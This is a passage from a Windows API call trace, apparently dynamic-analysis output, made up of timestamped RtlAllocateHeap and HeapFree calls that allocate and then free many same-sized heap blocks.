Flags=0x0, Size=0x13200) returned 0x21596b0 [0076.131] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x216c8c0 [0076.131] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x217fad0 [0076.132] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2192ce0 [0076.132] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21a5ef0 [0076.133] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21b9100 [0076.133] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21cc310 [0076.134] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21df520 [0076.134] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x21f2730 [0076.135] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2205940 [0076.135] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2218b50 [0076.136] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x222bd60 [0076.136] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x223ef70 [0076.137] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2252180 [0076.137] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x2f0) returned 0x458b10 [0076.137] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.137] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2265390 [0076.138] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22785a0 [0076.138] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x228b7b0 [0076.139] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x229e9c0 [0076.139] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22b1bd0 [0076.139] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22c4de0 [0076.140] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22d7ff0 [0076.140] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22eb200 [0076.141] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x22fe410 [0076.141] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2311620 [0076.142] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2324830 [0076.142] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2337a40 [0076.143] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x234ac50 [0076.143] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x235de60 [0076.144] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2371070 [0076.144] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2384280 [0076.145] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2397490 [0076.145] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23aa6a0 [0076.146] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23bd8b0 [0076.146] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23d0ac0 [0076.146] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23e3cd0 [0076.147] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x23f6ee0 [0076.148] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x240a0f0 [0076.148] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x241d300 [0076.149] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2430510 [0076.149] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2443720 [0076.150] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2456930 [0076.163] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2469b40 [0076.163] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x247cd50 [0076.163] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x248ff60 [0076.164] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24a3170 [0076.165] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x468) returned 0x46c5f0 [0076.165] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458b10 | out: hHeap=0x440000) returned 1 [0076.165] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24b6380 [0076.165] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24c9590 [0076.166] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24dc7a0 [0076.166] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x24ef9b0 [0076.166] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2502bc0 [0076.167] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2520080 [0076.169] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2533290 [0076.169] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x25464a0 [0076.169] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x25596b0 [0076.170] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x256c8c0 [0076.171] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x257fad0 [0076.172] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2592ce0 [0076.172] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x25a5ef0 [0076.173] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x25b9100 [0076.173] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x25cc310 [0076.174] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x25df520 [0076.174] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x25f2730 [0076.175] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2605940 [0076.175] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2618b50 [0076.176] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x262bd60 [0076.177] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x263ef70 [0076.177] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2652180 [0076.178] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2665390 [0076.178] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x26785a0 [0076.179] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x268b7b0 [0076.179] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x269e9c0 [0076.180] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x26b1bd0 [0076.180] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x26c4de0 [0076.180] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x26d7ff0 [0076.181] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x26eb200 [0076.181] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x26fe410 [0076.182] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2711620 [0076.182] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2724830 [0076.183] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2737a40 [0076.183] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x274ac50 [0076.184] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x275de60 [0076.184] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2771070 [0076.185] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2784280 [0076.185] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2797490 [0076.186] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x27aa6a0 [0076.186] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x27bd8b0 [0076.186] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x27d0ac0 [0076.187] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x27e3cd0 [0076.187] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x27f6ee0 [0076.188] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x280a0f0 [0076.188] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x281d300 [0076.189] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2830510 [0076.189] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x698) returned 0x458910 [0076.189] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x46c5f0 | out: hHeap=0x440000) returned 1 [0076.189] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2843720 [0076.190] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2856930 [0076.190] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2869b40 [0076.190] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x287cd50 [0076.191] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x288ff60 [0076.191] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x28a3170 [0076.192] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x28b6380 [0076.192] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x28c9590 [0076.193] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x28dc7a0 [0076.193] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x28ef9b0 [0076.194] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2902bc0 [0076.194] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2915dd0 [0076.195] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2928fe0 [0076.195] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x293c1f0 [0076.195] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x294f400 [0076.196] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2962610 [0076.196] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2975820 [0076.197] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2988a30 [0076.197] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x299bc40 [0076.198] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x29aee50 [0076.198] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x29c2060 [0076.198] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x29d5270 [0076.199] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x29e8480 [0076.199] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x29fb690 [0076.204] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2a0e8a0 [0076.204] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2a21ab0 [0076.204] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2a34cc0 [0076.205] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2a47ed0 [0076.205] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2a5b0e0 [0076.206] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2a6e2f0 [0076.208] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2a81500 [0076.209] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2a94710 [0076.209] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2aa7920 [0076.210] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2abab30 [0076.210] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2acdd40 [0076.211] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2ae0f50 [0076.211] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2af4160 [0076.212] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2b07370 [0076.212] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2b1a580 [0076.213] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2b2d790 [0076.213] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2b409a0 [0076.214] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2b53bb0 [0076.214] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2b66dc0 [0076.215] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2b79fd0 [0076.215] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2b8d1e0 [0076.216] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2ba03f0 [0076.216] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2bb3600 [0076.217] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2bc6810 [0076.217] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2bd9a20 [0076.217] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2becc30 [0076.218] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2bffe40 [0076.218] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2c13050 [0076.218] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2c26260 [0076.219] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2c39470 [0076.219] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2c4c680 [0076.220] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2c5f890 [0076.220] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2c72aa0 [0076.221] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2c85cb0 [0076.221] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2c98ec0 [0076.222] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2cac0d0 [0076.222] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2cbf2e0 [0076.223] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2cd24f0 [0076.223] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2ce5700 [0076.224] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2cf8910 [0076.224] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2d20080 [0076.226] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2d33290 [0076.233] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2d464a0 [0076.234] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2d596b0 [0076.234] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2d6c8c0 [0076.235] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2d7fad0 [0076.236] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x9e0) returned 0x46c5f0 [0076.236] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x458910 | out: hHeap=0x440000) returned 1 [0076.236] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2d92ce0 [0076.236] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2da5ef0 [0076.237] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2db9100 [0076.237] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2dcc310 [0076.238] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2ddf520 [0076.238] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2df2730 [0076.239] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2e05940 [0076.239] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2e18b50 [0076.239] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2e2bd60 [0076.240] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2e3ef70 [0076.240] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2e52180 [0076.241] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2e65390 [0076.241] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2e785a0 [0076.242] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2e8b7b0 [0076.242] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x13200) returned 0x2e9e9c0 [0076.293] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x46c5f0 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x477480 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x497280 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4aa490 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4bd6a0 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4d08b0 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4e3ac0 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4f6cd0 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x509ee0 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x51d0f0 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1e20080 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1e33290 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1e464a0 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1e596b0 | out: hHeap=0x440000) returned 1 [0078.772] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1e6c8c0 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1e7fad0 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1e92ce0 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1ea5ef0 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1eb9100 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1ecc310 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1edf520 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1ef2730 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1f20080 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1f33290 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1f464a0 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1f596b0 | out: hHeap=0x440000) returned 1 [0078.773] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1f6c8c0 | out: hHeap=0x440000) returned 1 [0078.786] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1f7fad0 | out: hHeap=0x440000) returned 1 [0078.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1f92ce0 | out: hHeap=0x440000) returned 1 [0078.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1fa5ef0 | out: hHeap=0x440000) returned 1 [0078.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1fb9100 | out: hHeap=0x440000) returned 1 [0078.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1fcc310 | out: hHeap=0x440000) returned 1 [0078.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1fdf520 | out: hHeap=0x440000) returned 1 [0078.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x1ff2730 | out: hHeap=0x440000) returned 1 [0078.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2005940 | out: hHeap=0x440000) returned 1 [0078.787] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2018b50 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x202bd60 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x203ef70 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2052180 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2065390 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x20785a0 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x208b7b0 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x209e9c0 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x20b1bd0 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x20c4de0 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x20d7ff0 | out: hHeap=0x440000) returned 1 [0078.836] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x20eb200 | out: hHeap=0x440000) returned 1 [0078.837] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x20fe410 | out: hHeap=0x440000) returned 1 [0078.837] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2120080 | out: hHeap=0x440000) returned 1 [0078.837] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2133290 | out: hHeap=0x440000) returned 1 [0078.843] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x21464a0 | out: hHeap=0x440000) returned 1 [0078.843] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x21596b0 | out: hHeap=0x440000) returned 1 [0078.843] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x216c8c0 | out: hHeap=0x440000) returned 1 [0078.843] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x217fad0 | out: hHeap=0x440000) returned 1 [0078.843] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2192ce0 | out: hHeap=0x440000) returned 1 [0078.843] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x21a5ef0 | out: hHeap=0x440000) returned 1 [0078.843] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x21b9100 | out: hHeap=0x440000) returned 1 [0078.844] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x21cc310 | out: hHeap=0x440000) returned 1 [0078.844] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x21df520 | out: hHeap=0x440000) returned 1 [0078.844] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x21f2730 | out: hHeap=0x440000) returned 1 [0078.844] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2205940 | out: hHeap=0x440000) returned 1 [0078.844] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2218b50 | out: hHeap=0x440000) returned 1 [0078.851] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x222bd60 | out: hHeap=0x440000) returned 1 [0078.851] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x223ef70 | out: hHeap=0x440000) returned 1 [0078.851] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2252180 | out: hHeap=0x440000) returned 1 [0078.851] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x2265390 | out: hHeap=0x440000) returned 1 [0078.851] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x22785a0 | out: hHeap=0x440000) returned 1 [0078.851] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x228b7b0 | out: hHeap=0x440000) returned 1 [0078.852] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x229e9c0 | out: hHeap=0x440000) returned 1 [0078.852] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x22b1bd0 | out: hHeap=0x440000) returned 1 [0078.852] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x22c4de0 | out: hHeap=0x440000) returned 1 [0078.852] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x22d7ff0 | out: hHeap=0x440000) returned 1 [0078.857] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x22eb200 | out: hHeap=0x440000) returned 1 